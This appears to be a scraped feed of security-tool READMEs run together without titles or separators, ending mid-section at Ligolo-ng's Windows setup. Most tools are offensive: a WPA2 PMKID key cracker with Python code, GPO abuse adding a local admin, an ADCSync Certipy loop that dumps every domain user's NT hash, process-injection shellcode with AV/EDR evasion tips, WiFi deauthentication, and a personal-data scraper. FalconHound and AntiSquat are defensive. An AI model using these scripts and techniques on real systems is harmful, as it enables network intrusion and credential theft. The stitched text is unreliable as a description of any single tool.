This program is a Python tool that recovers the pre-shared key of a WPA2 WiFi network without de-authentication and without requiring any clients to be on the network. It targets a weakness of certain access points that advertise the PMKID value in EAPOL message 1.
The explanation below is for understanding only; both steps are already implemented in the find_pw_chunk and calculate_pmkid functions.
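For reference, here is a minimal Python sketch of the standard PMKID derivation that this kind of attack relies on (PMK via PBKDF2-HMAC-SHA1, PMKID as a truncated HMAC-SHA1); all names and values below are illustrative, not the tool's exact code:

import hashlib
import hmac

def derive_pmkid(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # PMKID = first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)
    return hmac.new(pmk, b"PMK Name" + ap_mac + client_mac, hashlib.sha1).digest()[:16]

# Compare a candidate passphrase against the PMKID captured from EAPOL message 1
ap_mac = bytes.fromhex("aabbccddeeff")          # AP MAC from the capture
client_mac = bytes.fromhex("112233445566")      # client MAC from the capture
captured_pmkid = bytes.fromhex("0123456789abcdef0123456789abcdef")
if derive_pmkid("candidate-password", "ExampleSSID", ap_mac, client_mac) == captured_pmkid:
    print("[+] Pre-shared key found")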
Obtaining the PMKID
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
Note: you can use hcxtools or Bettercap to obtain the PMKID quickly without the steps below; the manual method is described for understanding.
To obtain the PMKID manually from Wireshark, put your wireless interface in monitor mode and start capturing all packets with airodump-ng or a similar tool. Then connect to the AP using an invalid password to capture the EAPOL message 1 of the handshake. Follow the next three steps to obtain the fields needed for the arguments.
Open the pcap in Wireshark:
Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
In the EAPOL message 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
In the EAPOL message 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below it.
If the access point is vulnerable, you should see the PMKID value as in the screenshot below:
Demo Run
Disclaimer
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
Install
Note: you must have CGO enabled, and may have to install gcc, to run CloudRecon.
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
Description
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (e.g. cloud providers' IP ranges) and find these hidden gems for testers by inspecting those SSL certificates.
The tool suite consists of three parts, written in Go:
Scrape - a live-running tool that inspects the ranges for a keyword in SSL certificate CN and SAN fields in real time.
Store - a tool to retrieve IPs' certificates and download all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
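To illustrate the underlying idea (CloudRecon itself is written in Go), here is a minimal Python sketch that connects to a host over TLS and pulls the certificate's CN and SANs; it assumes the third-party cryptography package, and the IP shown is just an example:

import socket
import ssl
from cryptography import x509
from cryptography.x509.oid import ExtensionOID, NameOID

def grab_cert_fields(ip, port=443, timeout=4.0):
    # Fetch the certificate without verification; we only want to read its fields
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=ip) as tls:
            der = tls.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(der)
    cn = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        san = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        san = []
    return cn, san

print(grab_cert_fields("198.51.100.10"))  # grep the output for your keyword of interest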
Usage
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs, CNs, and SANs in a local db file
cloudrecon retr - Query the local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
-a         Add this flag if you want to see all output including failures
-c int     How many goroutines running concurrently (default 100)
-h         print usage!
-i string  Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string  TLS ports to check for certificates (default "443")
-t int     Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
-c int      How many goroutines running concurrently (default 100)
-db string  String of the DB you want to connect to and save certs! (default "certificates.db")
-h          print usage!
-i string   Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string   TLS ports to check for certificates (default "443")
-t int      Timeout for TLS handshake (default 4)
RETR
retr [options]
-all         Return all the rows in the DB
-cn string   String to search for in the common name column, returns like-results (default "NONE")
-db string   String of the DB you want to connect to and save certs! (default "certificates.db")
-h           print usage!
-ip string   String to search for in the IP column, returns like-results (default "NONE")
-num         Return the number of rows (results) in the DB (by IP)
-org string  String to search for in the Organization column, returns like-results (default "NONE")
-san string  String to search for in the SAN column, returns like-results (default "NONE")
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users and computers. It will create an immediate scheduled task on the remote computer, running as SYSTEM for a computer GPO or as the logged-in user for a user GPO.
The default behavior adds a local administrator.
How to use
Basic usage
Add the user john to the local administrators group (password: H4x00r123..)
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest relationships to gather for BloodHound is local group membership and session information. As blue teamers, we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
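As an illustration, here is a minimal Python sketch of such a shortest-path check against the Neo4j graph (assuming the neo4j driver and BloodHound-style labels; the connection details, user name and group name are placeholders):

from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

query = """
MATCH (u:User {name:$user}), (g:Group {name:$group}),
      p = shortestPath((u)-[*1..]->(g))
RETURN length(p) AS hops
"""

with driver.session() as session:
    record = session.run(query, user="JDOE@CONTOSO.LOCAL", group="DOMAIN ADMINS@CONTOSO.LOCAL").single()
    if record:
        print(f"[!] Attack path found ({record['hops']} hops) - log to the SIEM or raise an alert")
driver.close()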
Other examples where FalconHound can be used:
Adding, removing or timing out sessions in the graph, based on logon and logoff events.
Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
Adding CVE information and whether there is a public exploit available to the graph.
All kinds of Azure activities.
Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
Adding new users, groups and computers to the graph.
Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and/or targets:
Azure Sentinel
Azure Sentinel Watchlists
Splunk
Microsoft Defender for Endpoint
Neo4j
MS Graph API (early stage)
CSV files
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Installation
Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.
The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
Requirements
BloodHound, or at least the Neo4j database for now.
A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
Credentials for each endpoint you want to talk to, with the required permissions.
Configuration
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
Usage
Default run
To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.
./falconhound -go
List all enabled actions
To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.
./falconhound -actionlist -go
Run with a select set of actions
To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.
./falconhound -ids action1,action2,action3 -go
Run with a different config file
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
Run with a different actions folder
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
Action folder structure
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
Action files
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items are fairly self-explanatory, there are some important things to note about actions:
Enabled
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
Debug
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
Query
The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Targets
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.
- Name: Neo4j
  Enabled: true
  Query: |
    MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
  Parameters:
    Computer: Computer
    TargetUserSid: TargetUserSid
    Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
Sentinel
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is another reason to keep query output under control; otherwise you might flood your target.
- Name: Sentinel
  Enabled: true
Sentinel Watchlists
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.
The SearchKey field is the column that will be used as the search key.
The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Splunk
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
  Enabled: true
Azure Data Explorer
Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
  Enabled: true
  Table: "name"
Extensions to the graph
Relationship: HadSession
Once a session has ended, it would normally be removed from the graph, but that felt like a waste of information. So instead of removing the session, it is added as a relationship between the computer and the user. The relationship is called HadSession and has the following properties:
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
Properties
FalconHound will add the following properties to nodes in the graph:
Computer:
- 'exploitable': true/false
- 'exploits': list of CVEs
- 'exposed': true/false
- 'ports': list of ports accessible from the internet
- 'alertids': list of alert ids
Credential management
The currently supported ways of providing FalconHound with credentials are:
Via the config.yml file on disk.
Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
Mixed mode.
Config.yml
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.
The required permissions for your AppID/AppSecret are listed here.
Keyvault
A more secure way of storing the credentials is to use an Azure Key Vault. Be aware that there is a small cost aspect to using Key Vaults. Access to Key Vaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Key Vault. This role only allows reading secret values, not even listing them. Do NOT reuse the ServicePrincipal that has access to Sentinel and/or MDE, since this almost completely negates the benefit of a Key Vault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
Once configured you can add the -keyvault parameter while starting FalconHound.
Mixed mode / fallback
When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
Deployment
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
There might also be some overlap, for instance with the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the one from MDE. This assumes you have MDE and Sentinel connected and most machines onboarded into MDE.
Sharphound / Azurehound
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
License
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
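A rough Python sketch of that loop, shelling out to Certipy (all flags, file names and the BloodHound JSON structure shown here are assumptions for illustration, not ADCSync's exact implementation):

import json
import subprocess

users = json.load(open("users.json"))            # user list extracted from a BloodHound dump (assumed format)
for user in users:
    upn = f"{user}@corp.local"
    # 1. Request a certificate for the victim UPN via the ESC1-vulnerable template
    subprocess.run(["certipy", "req", "-u", "lowpriv@corp.local", "-p", "Password123",
                    "-ca", "CORP-CA", "-template", "ESC1-Template",
                    "-upn", upn, "-dc-ip", "10.0.0.10", "-out", f"certificates/{user}"])
    # 2. Authenticate with the resulting PFX to recover the account's NT hash
    subprocess.run(["certipy", "auth", "-pfx", f"certificates/{user}.pfx", "-dc-ip", "10.0.0.10"])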
Installation
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
Usage
To use this tool we need the following things:
Valid Domain Credentials
A user list from a BloodHound dump that will be passed in.
A template vulnerable to ESC1 (Found with Certipy find)
Options:
-f, --file TEXT      Input User List JSON file from Bloodhound [required]
-o, --output TEXT    NTLM Hash Output file [required]
-ca TEXT             Certificate Authority [required]
-dc-ip TEXT          IP Address of Domain Controller [required]
-u, --user TEXT      Username [required]
-p, --password TEXT  Password [required]
-template TEXT       Template Name vulnerable to ESC1 [required]
-target-ip TEXT      IP Address of the target machine [required]
--help               Show this message and exit.
TODO
Support alternative authentication methods such as NTLM hashes and ccache files
Automatically run "certipy find" to find and grab templates vulnerable to ESC1
Add jitter and sleep options to avoid detection
Add type validation for all variables
Acknowledgements
puzzlepeaches: Telling me to hurry up and write this
The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and offer GSSAPI authentication over SSH.
The second is the ability to perform dynamic DNS updates for GSSAPI-abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI-based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name by both hostname and IP address.
Prerequisites
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
Windows
On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. On Windows, krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
Linux
The libkrb5-dev package needs to be installed prior to installing the Python requirements.
All
Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool
pip install -r requirements.txt
Enumeration Mode
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the operatingSystem attribute.
Once the list of non-Windows machines has been obtained, gssapi-abuse will attempt to connect to each host over SSH and determine whether GSSAPI-based authentication is permitted.
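A minimal Python sketch of that LDAP search (assuming the ldap3 package; server, credentials and base DN are placeholders):

from ldap3 import ALL, Connection, Server

server = Server("dc1.ad.ginge.com", get_info=ALL)
conn = Connection(server, user="john.doe@ad.ginge.com", password="SuperSecret!", auto_bind=True)

# AD-joined computers whose operatingSystem attribute does not mention Windows
conn.search("DC=ad,DC=ginge,DC=com",
            "(&(objectClass=computer)(!(operatingSystem=*Windows*)))",
            attributes=["dNSHostName", "operatingSystem"])

for entry in conn.entries:
    print(entry.dNSHostName, entry.operatingSystem)   # each host is then probed for SSH GSSAPI support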
Example
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS Mode
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently, dns mode relies on a working krb5 configuration with a valid TGT or a DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.
Examples
Adding a DNS A record for host ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully
Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a "."; this is important, otherwise the record becomes relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones than A records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully
Forward and reverse DNS lookup results after execution
DllNotificationInjection is a POC of a new "threadless" process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first (now second) entry of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
OPSEC Notes
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.
Acknowledgments
@C5pider for his ShellcodeTemplate project, which was used to create the trampoline shellcode, and for Havoc C2, which was used in the POC demo video.
Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.
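As a simplified illustration of the regex-based extraction, the patterns below are generic examples rather than Uscrapper's actual signatures:

import re
import requests

html = requests.get("https://example.com", timeout=10).text

emails = set(re.findall(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", html))
phones = set(re.findall(r"\+?\d[\d\s().-]{7,}\d", html))
socials = set(re.findall(r"https?://(?:www\.)?(?:twitter|linkedin|facebook|instagram)\.com/[^\s\"'<>]+", html))

print(emails, phones, socials)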
What's New?
Uscrapper 2.0:
Introduced multiple modules to bypass anti-web-scraping techniques.
Introducing crawl and scrape: an advanced module to crawl and scrape websites from within.
Implemented multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-web-scraping methods we use Selenium, which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them in parallel when the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
Inspiration for this project comes from the awesome Taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
Legal
Airgorah is designed for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for any damage you may cause by using this software.
Requirements
This software only works on Linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your ChatGPT API key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
Create a file named domains.txt. Type in a line-separated list of domains you'd like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
Run antisquat using python3.8 antisquat.py domains.txt
Examples:
Let's say you'd like to run AntiSquat on "flipkart.com".
Create a file named domains.txt, then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
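A toy Python sketch of the permutation step (the generation strategies below are generic typosquatting examples; AntiSquat's NLP/LLM-assisted generation is more involved):

def typo_permutations(domain: str):
    name, tld = domain.rsplit(".", 1)
    perms = set()
    # character omission: flipkart -> flipkar, flipart, ...
    perms.update(f"{name[:i]}{name[i + 1:]}.{tld}" for i in range(len(name)))
    # adjacent character swap: flipkart -> filpkart, flpikart, ...
    perms.update(f"{name[:i]}{name[i + 1]}{name[i]}{name[i + 2:]}.{tld}" for i in range(len(name) - 1))
    # alternative TLDs
    perms.update(f"{name}.{alt}" for alt in ("net", "org", "shop", "online"))
    perms.discard(domain)
    return sorted(perms)

print(typo_permutations("flipkart.com")[:10])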
Test case:
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.
As an example, for a TCP connection:
SYN packets are translated to a connect() on the remote host
A SYN-ACK is sent back if connect() succeeds
A RST is sent if connect() returns ECONNRESET, ECONNABORTED or ECONNREFUSED
Nothing is sent on timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
Windows
